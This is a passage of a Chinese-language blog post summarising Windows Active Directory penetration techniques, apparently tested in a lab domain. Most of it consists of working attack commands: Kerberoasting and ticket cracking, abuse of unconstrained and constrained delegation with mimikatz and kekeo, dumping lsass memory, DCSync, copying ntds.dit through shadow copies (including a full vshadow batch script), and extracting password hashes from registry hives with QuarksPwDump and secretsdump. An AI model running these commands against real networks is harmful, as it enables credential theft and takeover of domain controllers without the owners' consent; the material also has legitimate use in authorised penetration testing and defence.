<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921132855.png" alt></p>
<p>申请票据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Add-Type -AssemblyName System.IdentityModel</span><br><span class="line"></span><br><span class="line">New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList &quot;MSSQLSvc/Srv-Web-Kit.rootkit.org:1433&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921133740.png" alt></p>
<p>使用<code>klist</code>会发现票据已经在内存中。</p>
<p>导出票据</p>
<p><code>kerberos::list /export</code></p>
<p>爆破票据</p>
<p>使用<code>tgsrepcrack.py</code>爆破</p>
<p><code>python tgsrepcrack.py dictfile 导出的票据</code> 能不能爆破成功关键还是字典…</p>
<p>第二种  直接提取字节流转换成可以爆破的格式</p>
<p><a href="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" target="_blank" rel="noopener">Invoke-Kerberoast.ps1</a></p>
<p><code>Invoke-kerberoast –outputformat hashcat | fl</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921135208.png" alt></p>
<p>使用<code>hashcat</code>破解，本地复现的时候提示装一些东西，就没去破解…</p>
<p>重新写入内存(未测试)</p>
<p><code>./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500</code></p>
<p>把新的票据重新注入内存</p>
<p><code>kerberos::ptt sql.kirbi</code></p>
<h4 id="委派攻击-1"><a href="#委派攻击-1" class="headerlink" title="委派攻击"></a>委派攻击</h4><p><a href="https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L4906" target="_blank" rel="noopener">powerview.ps1</a></p>
<h5 id="无约束委派"><a href="#无约束委派" class="headerlink" title="无约束委派"></a>无约束委派</h5><p>在域控给服务账户设置无约束委派</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922122852.png" alt></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922122927.png" alt></p>
<p>选择第二项，无约束委派,如果服务没有注册<code>SPN</code>,先使用<code>setspn.exe</code>注册一下。</p>
<p>假设我们拿到了域内一台服务的权限</p>
<p>使用<code>PowerView.ps1</code>脚本查看开启无约束委派的服务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Get-NetUser -Unconstrained -Domain rootkit.org</span><br><span class="line">Get-NetComputer -Unconstrained -Domain rootkit.org</span><br></pre></td></tr></table></figure>

<p>提取受控主机内存中保存的票据，进行<code>ptt</code>攻击。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::tickets /export //导出票据</span><br></pre></td></tr></table></figure>

<p>可以看到有域管理的凭证，</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922124239.png" alt></p>
<p>注入该凭证。</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922124805.png" alt></p>
<p>然后访问域控。</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922125244.png" alt></p>
<h5 id="约束委派"><a href="#约束委派" class="headerlink" title="约束委派"></a>约束委派</h5><p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922125632.png" alt></p>
<p>在开启约束委派的主机上无法抓到用户的<code>TGT</code>,只能抓到服务票据，所以只能访问特定的服务。</p>
<p>如果知道服务账户的的明文密码或者哈希值，就可以拿到域管理权限。</p>
<p><a href="https://github.com/gentilkiwi/kekeo/releases" target="_blank" rel="noopener">kekeo</a></p>
<p>查看约束委派是否存在</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Get-DomainUser -TrustedToAuth -Domain rootkit.org //账户</span><br><span class="line">Get-NetComputer -Unconstrained -Domain rootkit.org //主机</span><br></pre></td></tr></table></figure>

<p>生成<code>tgt</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tgt::ask /user:sqladmin /domain:rootkit.org /password:Admin12345</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922134551.png" alt></p>
<p>申请<code>tgs</code>票据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tgs::s4u:TGT_sqladmin@ROOTKIT.ORG_krbtgt~rootkit.org@ROOTKIT.ORG.kirbi /user:administrator@rootkit.org  /service</span><br><span class="line">:cifs/OWA2013.rootkit.org</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922140157.png" alt></p>
<p>导入<code>tgs</code>票据</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922135813.png" alt></p>
<p><code>dir</code>访问域控共享目录</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922135923.png" alt></p>
<p><code>keoeo</code>也支持直接使用哈希获取<code>tgt</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tgt::ask /user:sqladmin /domain:rootkit.org /NTLM:hashvalue</span><br></pre></td></tr></table></figure>

<p>这样我们只要拿到服务的权限，就能提取出凭证进行攻击。</p>
<h5 id="基于资源的约束委派"><a href="#基于资源的约束委派" class="headerlink" title="基于资源的约束委派"></a>基于资源的约束委派</h5><p>看绿盟那篇博客吧…</p>
<h4 id="哈希导出"><a href="#哈希导出" class="headerlink" title="哈希导出"></a>哈希导出</h4><p>可以使用<code>procdump.exe</code>导出<code>lsass.exe</code>中的内存映像，离线抓密码</p>
<p><code>procdump64.exe -accepteula -ma lsass.exe lsass.dmp</code></p>
<p><code>mimikatz::sekurlsa:minidump lsass.dmp</code></p>
<p><code>mimikatz::sekurlsa:logonpasswords</code></p>
<h5 id="DCsync"><a href="#DCsync" class="headerlink" title="DCsync"></a>DCsync</h5><h6 id="mimikatz-1"><a href="#mimikatz-1" class="headerlink" title="mimikatz"></a>mimikatz</h6><p><code>lsadump::dcsync /domain:rootkit.org /all /csv</code>  利用<code>dcsync</code>(目录复制服务)获取<code>ntds.dit</code>中的密码哈希。 可以在域管理范围之内的任意一台主机运行。</p>
<p>多加一个<code>/user name</code> 参数，可以指定用户导出</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922143030.png" alt></p>
<p>也可以直接在域控上导出<code>lsass.exe</code>进程中的哈希。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">lsadump::lsa /inject</span><br></pre></td></tr></table></figure>

<h6 id="powershell-1"><a href="#powershell-1" class="headerlink" title="powershell"></a>powershell</h6><p><a href="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-DCSync.ps1" target="_blank" rel="noopener">Invoke-DCSync.ps1</a></p>
<h6 id="Empire"><a href="#Empire" class="headerlink" title="Empire"></a>Empire</h6><p><code>credentials/mimikatz/dcsync_hashdump</code></p>
<h5 id="NTDS-DIT-Volume-Shadow-Copy-Service"><a href="#NTDS-DIT-Volume-Shadow-Copy-Service" class="headerlink" title="NTDS.DIT/Volume Shadow Copy Service"></a>NTDS.DIT/Volume Shadow Copy Service</h5><p><code>NTDS.DIT</code>文件保存了域中所有用户的密码和哈希值。</p>
<h6 id="ntdsutil"><a href="#ntdsutil" class="headerlink" title="ntdsutil"></a>ntdsutil</h6><p>默认安装 </p>
<p>查询快照</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot &quot;List All&quot; quit quit</span><br><span class="line">ntdsutil snapshot &quot;List Mounted&quot; quit quit</span><br></pre></td></tr></table></figure>

<p>创建快照</p>
<p><code>ntdsutil snapshot &quot;activate instance ntds&quot; create quit quit</code></p>
<p>挂载快照</p>
<p><code>ntdsutil snapshot &quot;mount {2931cb68-5c88-4f27-ac6d-abcb738bfee7}&quot; quit quit</code></p>
<p>复制</p>
<p><code>copy C:\$SNAP_201909221525_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit</code></p>
<p>一定要在<code>cmd</code>中运行… 一开始在<code>ps</code>中运行，老是找不到路径…</p>
<p>卸载快照 清理痕迹</p>
<p><code>ntdsutil snapshot &quot;unmount {2931cb68-5c88-4f27-ac6d-abcb738bfee7}&quot; quit quit</code></p>
<h6 id="vssadmin"><a href="#vssadmin" class="headerlink" title="vssadmin"></a>vssadmin</h6><p>默认安装</p>
<p>查询系统快照</p>
<p><code>vssadmin list shadows</code></p>
<p>创建快照</p>
<p><code>vssadmin create shadow /for=c:</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922153355.png" alt></p>
<p>复制文件</p>
<p><code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit c:\ntds.dit</code></p>
<p>删除快照</p>
<p><code>vssadmin delete shadows /for=c: /quiet</code></p>
<h6 id="vshadow"><a href="#vshadow" class="headerlink" title="vshadow"></a>vshadow</h6><p>不自带，直接使用<code>.bat</code>版</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">setlocal</span><br><span class="line">if NOT &quot;%CALLBACK_SCRIPT%&quot;==&quot;&quot; goto :IS_CALLBACK</span><br><span class="line">set SOURCE_DRIVE_LETTER=%SystemDrive%</span><br><span class="line">set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit</span><br><span class="line">set DESTINATION_PATH=%~dp0</span><br><span class="line">@echo ...Determine the scripts to be executed/generated...</span><br><span class="line">set CALLBACK_SCRIPT=%~dpnx0</span><br><span class="line">set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd</span><br><span class="line">@echo ...Creating the shadow copy...</span><br><span class="line">&quot;%~dp0vshadow.exe&quot; -script=%TEMP_GENERATED_SCRIPT% -exec=&quot;%CALLBACK_SCRIPT%&quot; %SOURCE_DRIVE_LETTER%</span><br><span class="line">del /f %TEMP_GENERATED_SCRIPT%</span><br><span class="line">@goto :EOF</span><br><span class="line">:IS_CALLBACK</span><br><span class="line">setlocal</span><br><span class="line">@echo ...Obtaining the shadow copy device name...</span><br><span class="line">call %TEMP_GENERATED_SCRIPT%</span><br><span class="line">@echo ...Copying from the shadow copy to the destination path...</span><br><span class="line">copy &quot;%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%&quot; %DESTINATION_PATH%</span><br></pre></td></tr></table></figure>

<p>上传<code>.bat</code>和<code>exe</code>文件到当前目录，可以下载源码编译，想偷懒也可以直接<a href="https://www.mypcrun.com/file-info-page/vshadow-exe/" target="_blank" rel="noopener">戳这里</a> 不保证安全性。</p>
<p>运行脚本，会自动执行整个流程。</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922155003.png" alt></p>
<p>导出之前还需要用<code>esentutl</code>修复一下</p>
<p><code>esentutl /p /o ntds.dit</code></p>
<p>导出<code>syskey</code></p>
<p><code>reg save hklm\system system.hive</code></p>
<h6 id="…"><a href="#…" class="headerlink" title="…."></a>….</h6><h5 id="从NTDS-DIT中提取哈希"><a href="#从NTDS-DIT中提取哈希" class="headerlink" title="从NTDS.DIT中提取哈希"></a>从NTDS.DIT中提取哈希</h5><p>得到<code>ntds.dit</code>文件以后，直接在线导出哈希</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit --system-file system.hive -o pass.txt</span><br></pre></td></tr></table></figure>

<p><a href="https://github.com/tuthimi/quarkspwdump" target="_blank" rel="noopener">quarkspwdump.exe</a></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190922160347.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">quarks-pwdump.exe &lt;options&gt;</span><br><span class="line">Options :</span><br><span class="line">-dhl  --dump-hash-local</span><br><span class="line">-dhdc --dump-hash-domain-cached</span><br><span class="line">-dhd  --dump-hash-domain (NTDS_FILE must be specified)</span><br><span class="line">-db   --dump-bitlocker (NTDS_FILE must be specified)</span><br><span class="line">-nt   --ntds-file FILE</span><br><span class="line">-hist --with-history (optional)</span><br><span class="line">-t    --output-type JOHN/LC (optional, if no=&gt;JOHN)</span><br><span class="line">-o    --output FILE (optional, if no=&gt;stdout)</span><br><span class="line"></span><br><span class="line">Example: quarks-pwdump.exe --dump-hash-domain --with-history</span><br></pre></td></tr></table></figure>

<p>也可以用<a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1" target="_blank" rel="noopener">Invoke-NinjaCopy.ps1</a></p>
<h5 id="注册表导出哈希"><a href="#注册表导出哈希" class="headerlink" title="注册表导出哈希"></a>注册表导出哈希</h5><p>涉及到三个注册表项，分别是<code>HKEY_LOCAL_MACHINE\SAM</code> <code>HKEY_LOCAL_MACHINE\SECURITY</code> <code>HKEY_LOCAL_MACHINE\SYSTEM</code></p>
<p><code>HKEY_LOCAL_MACHINE\SAM</code>包含本地用户凭证</p>
<p><code>HKEY_LOCAL_MACHINE\SECURITY</code>中缓存了域用户的凭证</p>
<p><code>HKEY_LOCAL_MACHINE\SYSTEM</code>中可以提取出<code>syskey</code>，进而解密哈希</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reg.exe save hklm\sam c:\sam.save</span><br><span class="line">reg.exe save hklm\security c:\security.save</span><br><span class="line">reg.exe save hklm\system c:\system.save</span><br></pre></td></tr></table></figure>

<p>使用<code>impacket</code>套件中的<code>secretsdump.py</code>解密</p>
<p><code>python secretsdump.py -sam ../../sam.save  -security ../../security.save  -system ../../system.save  LOCAL</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190923105223.png" alt></p>
<p>也可以用<code>cain</code>.</p>
<h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p>工具千千万，重要的还是思路吧 : ）</p>
<h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h3><p><a href="https://klionsec.github.io/2016/08/10/ntlm-kerberos/" target="_blank" rel="noopener">深刻理解windows安全认证机制 ntlm &amp; Kerberos</a></p>
<p><a href="https://www.secpulse.com/archives/94848.html" target="_blank" rel="noopener">彻底理解Windows认证 – 议题解读</a></p>
<p><a href="http://drops.xmd5.com/static/drops/tips-11631.html" target="_blank" rel="noopener">http://drops.xmd5.com/static/drops/tips-11631.html</a></p>
<p><a href="https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4" target="_blank" rel="noopener">LM, NTLM, Net-NTLMv2, oh my!</a></p>
<p><a href="https://github.com/crazywa1ker/DarthSidious-Chinese" target="_blank" rel="noopener">https://github.com/crazywa1ker/DarthSidious-Chinese</a></p>
<p><a href="https://sakuxa.com/2019/04/03/01-Windows认证之NTLM/" target="_blank" rel="noopener">https://sakuxa.com/2019/04/03/01-Windows认证之NTLM/</a></p>
<p><a href="[http://www.h0r2yc.cn/2019/08/17/windows%E8%AE%A4%E8%AF%81-%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE%E3%80%81%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8/](http://www.h0r2yc.cn/2019/08/17/windows认证-白银票据、黄金票据分析及利用/)">windows认证-白银票据、黄金票据分析及利用</a></p>
<p><a href="https://3gstudent.github.io/域渗透-Kerberoasting/" target="_blank" rel="noopener">域渗透——Kerberoasting</a></p>
<p><a href="https://www.anquanke.com/post/id/92646" target="_blank" rel="noopener">我所了解的内网渗透——内网渗透知识大总结</a></p>
<p><a href="https://www.freebuf.com/articles/system/6089.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/6089.html</a></p>
<p><a href="https://www.freebuf.com/articles/system/198381.html" target="_blank" rel="noopener">Kerberos协议探索系列之委派篇</a></p>
<p><a href="https://www.anquanke.com/post/id/166934" target="_blank" rel="noopener">攻击活动目录：无约束委派及域林信任</a></p>
<p><a href="https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/" target="_blank" rel="noopener">S4U2Pwnage</a></p>
<p><a href="http://blog.nsfocus.net/analysis-attacks-entitlement-resource-constrained-delegation/" target="_blank" rel="noopener">http://blog.nsfocus.net/analysis-attacks-entitlement-resource-constrained-delegation/</a></p>
<p><a href="https://xz.aliyun.com/t/2931" target="_blank" rel="noopener">Attacking Kerberos Delegation</a></p>
<p><a href="https://www.anquanke.com/post/id/151241#h2-12" target="_blank" rel="noopener">域密码哈希导出的那些事儿</a></p>
<p><a href="https://www.cnblogs.com/backlion/p" target="_blank" rel="noopener">渗透测试中心</a></p>
<p><a href="[https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84NTDS.dit%E6%96%87%E4%BB%B6/](https://3gstudent.github.io/3gstudent.github.io/域渗透-获得域控服务器的NTDS.dit文件/)">域渗透-获得域控服务器的NTDS.dit文件</a></p>
<p><a href="[https://wooyun.js.org/drops/%E5%AF%BC%E5%87%BA%E5%BD%93%E5%89%8D%E5%9F%9F%E5%86%85%E6%89%80%E6%9C%89%E7%94%A8%E6%88%B7hash%E7%9A%84%E6%8A%80%E6%9C%AF%E6%95%B4%E7%90%86.html](https://wooyun.js.org/drops/导出当前域内所有用户hash的技术整理.html)">导出当前域内所有用户hash的技术整理</a></p>

        </div>
        
          


  <section class='meta' id="footer-meta">
    <hr>
    <div class='new-meta-box'>
      
        
          <div class="new-meta-item date" itemprop="dateUpdated" datetime="2019-09-26T14:41:13+08:00">
  <a class='notlink'>
    <i class="fas fa-clock" aria-hidden="true"></i>
    <p>最后更新于 2019年9月26日</p>
  </a>
</div>

        
      
        
          
  
  <div class="new-meta-item meta-tags"><a class="tag" href="/tags/域渗透/" rel="nofollow"><i class="fas fa-hashtag" aria-hidden="true"></i>&nbsp;<p>域渗透</p></a></div>


        
      
        
          

        
      
    </div>
  </section>


        
        
            <div class="prev-next">
                
                    <section class="prev">
                        <span class="art-item-left">
                            <h6><i class="fas fa-chevron-left" aria-hidden="true"></i>&nbsp;上一页</h6>
                            <h4>
                                <a href="/2019/10/31/thinkcmfx/" rel="prev" title="thinkcmfx 代码执行分析">
                                  
                                      thinkcmfx 代码执行分析
                                  
                                </a>
                            </h4>
                            
                                
                                <h6 class="tags">
                                    <a class="tag" href="/tags/代码审计/"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>代码审计</a>
                                </h6>
                            
                        </span>
                    </section>
                
                
                    <section class="next">
                        <span class="art-item-right" aria-hidden="true">
                            <h6>下一页&nbsp;<i class="fas fa-chevron-right" aria-hidden="true"></i></h6>
                            <h4>
                                <a href="/2019/09/18/data-forward/" rel="prev" title="数据转发姿势(不定期更新...)">
                                    
                                        数据转发姿势(不定期更新...)
                                    
                                </a>
                            </h4>
                            
                                
                                <h6 class="tags">
                                    <a class="tag" href="/tags/安全/"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>安全</a> <a class="tag" href="/tags/内网/"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>内网</a>
                                </h6>
                            
                        </span>
                    </section>
                
            </div>
        
      </section>
    </article>
  

  
    <!-- 显示推荐文章和评论 -->



  <article class="post white-box comments">
    <section class="article typo">
      <h4><i class="fas fa-comments fa-fw" aria-hidden="true"></i>&nbsp;评论</h4>
      
      
        <section id="comments">
          <div id="lv-container" data-id="city" data-uid="MTAyMC80NTYyOC8yMjEzOQ==">
            <noscript><div><i class='fas fa-exclamation-triangle'>&nbsp;无法加载Livere评论系统，请确保您的网络能够正常访问。</div></noscript>
          </div>
        </section>
      
      
      
    </section>
  </article>


  




<!-- 根据页面mathjax变量决定是否加载MathJax数学公式js -->



  <script>
    window.subData = {
      title: '域渗透常用姿势总结',
      tools: true
    }
  </script>


</div>
<aside class='l_side'>
  
    
    
      
        
          
          
        
          
          
            
              
  <section class='widget toc-wrapper'>
    
<header class='material'>
  <div><i class="fas fa-list fa-fw" aria-hidden="true"></i>&nbsp;&nbsp;本文目录</div>
  
    <div class='wrapper'><a class="s-toc rightBtn" rel="external nofollow noopener noreferrer" href="javascript:void(0)"><i class="fas fa-thumbtack fa-fw"></i></a></div>
  
</header>

    <div class='content material'>
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#域渗透-—-预备知识"><span class="toc-text">域渗透 — 预备知识</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#何为域"><span class="toc-text">何为域</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#windows-认证方式"><span class="toc-text">windows 认证方式</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#NTLM认证"><span class="toc-text">NTLM认证</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#Hash类型"><span class="toc-text">Hash类型</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#工作组环境中的认证"><span class="toc-text">工作组环境中的认证</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#域环境中的认证"><span class="toc-text">域环境中的认证</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#pth"><span class="toc-text">pth</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#ptk"><span class="toc-text">ptk</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Kerberos认证"><span class="toc-text">Kerberos认证</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#Golden-Ticket-黄金票据"><span class="toc-text">Golden Ticket(黄金票据)</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#Silver-Ticket-白银票据"><span class="toc-text">Silver Ticket(白银票据)</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#MS14-068"><span class="toc-text">MS14-068</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#委派攻击"><span class="toc-text">委派攻击</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#Kerberoasting"><span class="toc-text">Kerberoasting</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#组策略首选项-SYSVOL-GPP漏洞-–2k08"><span class="toc-text">组策略首选项 + SYSVOL (GPP漏洞 –2k08)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#域信任关系"><span class="toc-text">域信任关系</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#域信息收集常用命令"><span class="toc-text">域信息收集常用命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#待补充…"><span class="toc-text">待补充…</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#域渗透-—-实践过程"><span class="toc-text">域渗透 — 实践过程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#pth-1"><span class="toc-text">pth</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#mimikatz"><span class="toc-text">mimikatz</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#powershell"><span class="toc-text">powershell</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ptt"><span class="toc-text">ptt</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#MS14-068-1"><span class="toc-text">MS14-068</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#黄金票据"><span class="toc-text">黄金票据</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#白银票据"><span class="toc-text">白银票据</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ptk-1"><span class="toc-text">ptk</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#kerberoast"><span class="toc-text">kerberoast</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#委派攻击-1"><span class="toc-text">委派攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#无约束委派"><span class="toc-text">无约束委派</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#约束委派"><span class="toc-text">约束委派</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#基于资源的约束委派"><span class="toc-text">基于资源的约束委派</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#哈希导出"><span class="toc-text">哈希导出</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#DCsync"><span class="toc-text">DCsync</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#mimikatz-1"><span class="toc-text">mimikatz</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#powershell-1"><span class="toc-text">powershell</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#Empire"><span class="toc-text">Empire</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#NTDS-DIT-Volume-Shadow-Copy-Service"><span class="toc-text">NTDS.DIT/Volume Shadow Copy Service</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#ntdsutil"><span class="toc-text">ntdsutil</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#vssadmin"><span class="toc-text">vssadmin</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#vshadow"><span class="toc-text">vshadow</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#…"><span class="toc-text">….</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#从NTDS-DIT中提取哈希"><span class="toc-text">从NTDS.DIT中提取哈希</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#注册表导出哈希"><span class="toc-text">注册表导出哈希</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他"><span class="toc-text">其他</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#参考资料"><span class="toc-text">参考资料</span></a></li></ol>
    </div>
  </section>


            
          
        
          
          
        
          
          
        
          
          
        
          
          
        
      
    

  
</aside>

<footer id="footer" class="clearfix">
  
  
  <br>

  <i class="fas fa-chart-area"></i>
  <span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date(); 
    function createtime() { 
        var grt= new Date("07/28/2019 00:00:00");//在此处修改你的建站时间
        now.setTime(now.getTime()+250); 
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); 
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); 
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum); 
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;} 
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); 
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;} 
        document.getElementById("timeDate").innerHTML = "本站已运行 "+dnum+" 天 "; 
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒"; 
    } 
setInterval("createtime()",250);
</script>
<span class="post-count"> | 字数统计：14.8k</span>
</footer>
<script>setLoadingBarProgress(80);</script>


      <script>setLoadingBarProgress(60);</script>
    </div>
    <a class="s-top fas fa-arrow-up fa-fw" href='javascript:void(0)'></a>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>

  <script>
    var GOOGLE_CUSTOM_SEARCH_API_KEY = "";
    var GOOGLE_CUSTOM_SEARCH_ENGINE_ID = "";
    var ALGOLIA_API_KEY = "";
    var ALGOLIA_APP_ID = "";
    var ALGOLIA_INDEX_NAME = "";
    var AZURE_SERVICE_NAME = "";
    var AZURE_INDEX_NAME = "";
    var AZURE_QUERY_KEY = "";
    var BAIDU_API_ID = "";
    var SEARCH_SERVICE = "hexo" || "hexo";
    var ROOT = "/"||"/";
    if(!ROOT.endsWith('/'))ROOT += '/';
  </script>

